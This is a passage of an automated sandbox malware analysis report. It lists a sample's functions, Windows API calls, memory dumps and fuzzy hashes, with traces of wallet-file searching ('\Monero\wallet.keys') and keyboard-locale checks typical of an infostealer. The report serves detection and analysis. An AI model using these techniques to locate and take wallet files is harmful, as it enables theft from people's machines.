                                      Function 0052DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005414B0,00540C2A), ref: 0052DAEB
                                      • StrCmpCA.SHLWAPI(?,005414B4), ref: 0052DB33
                                      • StrCmpCA.SHLWAPI(?,005414B8), ref: 0052DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0052DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: f265bb4183cdf3c6bee6ac6b9ed07a428036c6adae889cda08f1cac4990868df
                                      • Instruction ID: 64df8e26d805cce2cba298ae2ea30e8620c7bcb0a6a8c4c9933047ec53db7061
                                      • Opcode Fuzzy Hash: f265bb4183cdf3c6bee6ac6b9ed07a428036c6adae889cda08f1cac4990868df
                                      • Instruction Fuzzy Hash: 60914572900115ABCB14FB70EC9A9ED7B7CBFD5300F408558F94A96185EE34AB09CFA2
                                      Function 008EB9F9 Relevance: 11.6, Strings: 8, Instructions: 1636COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ;$!o$.^??$0"c~$2q=y$lz-/$0_$b9
                                      • API String ID: 0-650997007
                                      • Opcode ID: e22e8d146b441742ed83563e9b8fa97b28c4216d9c986c6383783af59d4e593f
                                      • Instruction ID: 6779edbbb05a8fb4e313690f97361f008635b650e8aad44ae981be4219c5c0a2
                                      • Opcode Fuzzy Hash: e22e8d146b441742ed83563e9b8fa97b28c4216d9c986c6383783af59d4e593f
                                      • Instruction Fuzzy Hash: E8B2E9F3A0C2009FE304AE2DDC8567ABBE9EF94720F16892DE6C5C7744EA3558418797
                                      Function 008E85F6 Relevance: 11.6, Strings: 8, Instructions: 1562COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: }~]$&35$&35$&QR]$+D+}$_8V$<3^$lO3
                                      • API String ID: 0-2813008048
                                      • Opcode ID: 20fd6a455d255abf73b0a613ca6168753f0c6a65300f5d829050b561acd3492d
                                      • Instruction ID: a7cb7eb940b69e9da24316ab123b920752cdc1e5b1092535d5597612aafe6b3c
                                      • Opcode Fuzzy Hash: 20fd6a455d255abf73b0a613ca6168753f0c6a65300f5d829050b561acd3492d
                                      • Instruction Fuzzy Hash: 82B2E5F360C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7344EA7558458697
                                      Function 00537B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,005405AF), ref: 00537BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00537BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00537C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00537C62
                                      • LocalFree.KERNEL32(00000000), ref: 00537D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 2a7b8c3e4d881dc081a370147ee3c07b36ccb6d8062b1eff26ffd09f22ba68d5
                                      • Instruction ID: 8ff8328888e1e4bac4e67db724ed4c1a824b09e73209edfd5181043bee49cd1d
                                      • Opcode Fuzzy Hash: 2a7b8c3e4d881dc081a370147ee3c07b36ccb6d8062b1eff26ffd09f22ba68d5
                                      • Instruction Fuzzy Hash: 03413D7194021DABDB24DB94DC99BEEBB74FF48700F204199E50A72191DB742F85CFA1
                                      Function 008E6B3E Relevance: 10.3, Strings: 7, Instructions: 1590COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: G.;U$QO[k$]9om$s^~<$w_lw$|m>W$g{f
                                      • API String ID: 0-214937156
                                      • Opcode ID: 6d17f64aea5509a05d35951ab6b2943e19e9bbebc7d8ed7ec98c83b946beed76
                                      • Instruction ID: d2b1ee60f3f64c073c5547173ffc8997174e34cf2d372e38c92c90908f54272b
                                      • Opcode Fuzzy Hash: 6d17f64aea5509a05d35951ab6b2943e19e9bbebc7d8ed7ec98c83b946beed76
                                      • Instruction Fuzzy Hash: FEB222F3A082049FE3046E29EC8567AFBE9EF94720F164A3DEAC4C7740E63558058797
                                      Function 0052E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00540D73), ref: 0052E4A2
                                      • StrCmpCA.SHLWAPI(?,005414F8), ref: 0052E4F2
                                      • StrCmpCA.SHLWAPI(?,005414FC), ref: 0052E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0052EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 84f24f410a4d7d0107d4d969b8168bb85eca2d5cad8a342f3e5e8690362ed064
                                      • Instruction ID: 7bba0356556c2eecc75dec499aa777aa25798b5f56265a0df76f4a38e7428ba2
                                      • Opcode Fuzzy Hash: 84f24f410a4d7d0107d4d969b8168bb85eca2d5cad8a342f3e5e8690362ed064
                                      • Instruction Fuzzy Hash: 53122472910119AADB14FB70DC9AEEDBB38BFD4300F404598B54AA6191EF346F49CF92
                                      Function 008F4206 Relevance: 9.2, Strings: 6, Instructions: 1664COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: "$'Cv$2~$So^$|u{{$~c{/
                                      • API String ID: 0-2567272145
                                      • Opcode ID: 56193b0c2c71e718115300cd3b4cfac0c0e2d2befb5447d937f03e98214d4cf2
                                      • Instruction ID: fa419a2e141241a83a2d737efc6d5bf76239a414a9dad1bba26c8606f56f48b3
                                      • Opcode Fuzzy Hash: 56193b0c2c71e718115300cd3b4cfac0c0e2d2befb5447d937f03e98214d4cf2
                                      • Instruction Fuzzy Hash: B4B2F7F3A082049FE304AE2DEC8567ABBE9EFD4760F16853DEAC4C3744E63558058697
                                      Function 008E513D Relevance: 9.1, Strings: 6, Instructions: 1618COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 6L<$;Fz$?go$qA_~$qA_~$aR{
                                      • API String ID: 0-3253444424
                                      • Opcode ID: 3d9b051d5f8a6280b3acfa7d3e3e823097a99a4cc29d56e3dd8102a456f2980e
                                      • Instruction ID: 19649832beed701424c4a663016f6cc6d447a8284d844df8778e17ec84f2711e
                                      • Opcode Fuzzy Hash: 3d9b051d5f8a6280b3acfa7d3e3e823097a99a4cc29d56e3dd8102a456f2980e
                                      • Instruction Fuzzy Hash: ECB206F360C2049FE304AE2DEC8567ABBE9EF94720F16493DE6C5C7740EA3598058796
                                      Function 00529AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: NR
                                      • API String ID: 4291131564-263112399
                                      • Opcode ID: 2f5ad2118ace210f131b2650ee8d78f2adcd57e352311e0b11a41755b21d2537
                                      • Instruction ID: 71626ab0f4071378dc82f4d01bfe06f156fb8fa2a7ea8c8edff6b4e30b9242f6
                                      • Opcode Fuzzy Hash: 2f5ad2118ace210f131b2650ee8d78f2adcd57e352311e0b11a41755b21d2537
                                      • Instruction Fuzzy Hash: C5119FB4640308AFEB10CFA4D895FAA77A5FB8A700F208058F9159B390C6B6A901DB94
                                      Function 008F267F Relevance: 7.9, Strings: 5, Instructions: 1652COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: nnR$$go^$/cw?$:N]V$b]c
                                      • API String ID: 0-1299212506
                                      • Opcode ID: 46600f186f43273ff70e1eaa52e3218868d7e7d2181eec12f1a2dac2bbc86b1c
                                      • Instruction ID: 1253c8d4a3d1e4169608ec35399258f4a5901c05874c41653f4dcd1d98b20ff3
                                      • Opcode Fuzzy Hash: 46600f186f43273ff70e1eaa52e3218868d7e7d2181eec12f1a2dac2bbc86b1c
                                      • Instruction Fuzzy Hash: 0CB217F3A0C2149FE304AE2DDC8166AFBE5EF94720F1A453DEAC4C7740EA7598058697
                                      Function 0052C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0052C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0052C87C
                                      • lstrcat.KERNEL32(?,00540B46), ref: 0052C943
                                      • lstrcat.KERNEL32(?,00540B47), ref: 0052C957
                                      • lstrcat.KERNEL32(?,00540B4E), ref: 0052C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
